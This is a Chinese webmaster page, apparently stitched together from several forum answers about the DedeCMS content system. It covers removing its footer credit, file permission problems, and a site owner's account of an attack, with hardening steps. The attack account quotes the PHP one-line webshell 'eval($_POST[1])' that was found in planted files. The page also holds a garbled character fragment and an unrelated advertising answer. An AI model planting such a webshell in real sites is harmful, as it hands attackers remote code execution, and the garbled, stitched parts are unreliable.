dedecms的漏洞:Dedecms的隐患如何预防风险

dedecms的漏洞:Dedecms的隐患如何预防风险,第1张

一、power by dedecms什么意思

在我们上网的时候,会见到页面页底很多带power by dedecms的网站,power by dedecms表示这个网站基于织梦DedeCMS系统搭建,DedeCMS是开源免费的,但考虑版权问题建议留下此说明信息。

二、power by dedecms怎么去掉

接下来我们说一下power by dedecms怎么去掉?power by dedecms去掉方法很简单,进入织梦后台,点击系统,==》系统基本设置,==》网站版权信息,修改你想要的内容即可。(以上这一种方法仅限于2013-07-15以前的版本,其他版本请看另一方法)

三、织梦2013年6月7日补丁或者最近下载的织梦dedecms程序,去掉power by dedecms的方法

织梦2013年6月7日补丁或者最近下载的织梦dedecms程序,用上面的方法并不起作用,我们参考下面的方法去解决:

对比官方更新的内容,织梦DedeCMS官方2013年6月7号完成的安全补丁主要更新的文件是include/dedesqlclassphp,修复变量覆盖漏洞。我们对比之前版本的include/dedesqlclassphp文件,会发现最新的include/dedesqlclassphp文件会多出第588到第592行的那几段代码(也可以复制以下一小段代码进行搜索),代码大致如下:

$arrs1 = array(0x63,0x66,0x67,0x5f,0x70,0x6f,0x77,0x65,0x72,0x62,0x79);

$arrs2 = array(0x20,0x3c,0x61,0x20,0x68,0x72,0x65,0x66,0x3d,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,

0x77,0x77,0x77,0x2e,0x64,0x65,0x64,0x65,0x63,0x6d,0x73,0x2e,0x63,0x6f,0x6d,0x20,0x74,0x61,0x72,

0x67,0x65,0x74,0x3d,0x27,0x5f,0x62,0x6c,0x61,0x6e,0x6b,0x27,0x3e,0x50,0x6f,0x77,0x65,0x72,0x20,

0x62,0x79,0x20,0x44,0x65,0x64,0x65,0x43,0x6d,0x73,0x3c,0x2f,0x61,0x3e);

然后我们把这段代码删除掉或者注释掉,保存上传覆盖即可。

我也遇到了这样的问题,不管是用FTP软件修改属性,或者是右键这个文件改为只读,都不行,登录后台或者刷新后台,就会自动恢复到原来的权限。

找遍了互联网都没找到解决办法,你的是哪个系统的主机啊?我的是windows2008主机。后来登录主机,找到data/commonincphp这个文件,右键——属性——安全——然后把写入权限后面的拒绝,打上勾。再刷新后台也就不提示了。不知道这样是否真正解决了问题,后来我右键这个文件夹,也改成了只读属性。保存,刷新后台,就不自动恢复了。真奇怪。我暂时就这样了。希望能帮助到你。

�谌莺苌伲�赡苄慈氲氖焙虿皇呛芊奖悖�还�庑┐�氲淖饔萌肥挡恍〉摹�edecms一直是很火的建站cms,主要得益于两大站长网的鼎力支持;不过,人火是非多,cms太火了同样会被别有用心的人盯上。我的网站一直在使用dedecms,前段时间又一次受到攻击,攻击的目的很简单,那么便是黑链,知道后稍微修改下代码就恢复了,不是很严重;这段时间网站又被莫名上传文件,类似前一次,虽然对方还没来得及修改网站模板,不过这说明网站安全防患还未到位,对方任何时候都可能再次取得管理员权限,所以要特别注意网站的安全防患措施。因为我比较喜欢寻根究底,所以就去网上找了一下相关的资料,发现这确实是dedecms的漏洞,黑客可以利用多维的变量绕过正则检测,漏洞主要发生在/plus/mytag_jsphp中,原理便是准备一个MySQL数据库来攻击已知网站的数据库,通过向数据库中写入一句话的代码,只要成功写入,那么以后便可以利用这些代码来获得后台管理员权限。结合我的网站被攻击已经别人类似的经历来看,黑客写入的文件主要存在于/plus/文件夹下,目前已知的几个文件包括gaphp、logphp、bphp、b1php等,文件的特征便是短小,内容很少,可能写入的时候不是很方便,不过这些代码的作用确实不小的。下面这是gaphp文件中的部分代码:<title>login</title>no<phpeval($_POST[1])><title>login</title>no<phpeval($_POST[1])><title>login</title>no<phpeval($_POST[1])>实际的代码比上面截取的要长,不过都是这段代码的重复,至于logphp的代码,同这个类似,只有一句话,简单明了,如果你对网络安全稍有了解,那么会知道<php eval($_POST[1]);>是php一句话木马,使用部分指定的工具可以执行这段代码,预计是破解密码的功能。既然已经知道对方是利用什么样的漏洞,同时知道对方利用什么样的原理来利用漏洞,那么要怎么预防这些危险的事发生呢?经过查询大量的资料,我初步整理出下面这些预防漏洞被利用的步骤,希望对同样适用dedecms的站长朋友们有所帮助。一、升级版本打好补丁设置目录权限这是官方对此的解决办法,不管你使用的是什么版本的dedecms,都要及时在后台升级版本自动更新补丁,这是避免漏洞被利用的最重要的一步;同时官方还提供设置目录的方法,主要是设置data、templets、uploads、a为可读写不可执行权限;include、member、plus、后台管理目录等设置为可执行可读不可写入权限;删除install及special目录,具体如何设置见官方说明。二、修改admin账号及密码黑客可能是利用默认admin账号,随后推测密码来破解的,所以修改默认的admin账号非常重要,至于如何修改,方法很多,比较有效的是用phpadmin登陆网站数据库,找到dede_admin数据库表(dede是数据库表前缀),修改其中userid及pwd两项,其中密码一定要修改成f297a57a5a743894a0e4,这是默认的密码admin;修改后去后台登陆,登陆dede后台后修改密码。三、别的值得注意的地方至于更多的细节,同样要注意,尽量别选择太廉价的空间,太廉价的空间很容易出现服务器本身的安全问题,只要服务器出现问题,整个服务器下面的网站都没救了。还有便是,如果没必要,尽量别开通会员注册什么的,使用起来很麻烦;至于网站后台目录,不要写到robotstxt里面,同时每个月至少换一次,管理员密码什么的同样要更换,避免和别的账号密码相同被推测出来。

这是织梦更新后searchphp的问题,解决的方法很简单,找一个老的文件换掉新的就解决了,其实老的本身没什么问题的,不知道为什么这次更新要修改他,至于代码我没去看,只要能解决问题就行了,是吧,请采纳!

您好,跟版网团队很高兴为您解答:

这个问题的话实现方法其实蛮多的,但是首选pc+手机端公用同一数据。当然如果有条件也可以搞成两个网站,不过维护起来比较麻烦。

首先一种方法,也是织梦最早使用的方法,用织梦后台的wap模块去开发wap模板,这种方法虽然比较早,但是使用的人还是比较少的。

最新版的织梦2015-8-26补丁,更新了织梦手机站模块,升级后会有一个m目录,这个目录会自动生成一个织梦手机网站,当然模板的话也可以去自己开发。具体我也没用过,建议您去了解一下。

还有一种方法就是对织梦进行二次开发,这种也就是比较麻烦的方法。不推荐新手去做这方面的二次开发。否则会搞的焦头烂耳。

以上只是推荐的几种实现方法。希望我的回答能够帮到您。跟版网-专业织梦模板定制和下载站,已经完美解决织梦pc+手机端。

DABAN RP主题是一个优秀的主题,极致后台体验,无插件,集成会员系统
网站模板库 » dedecms的漏洞:Dedecms的隐患如何预防风险

0条评论

发表评论

提供最优质的资源集合

立即查看 了解详情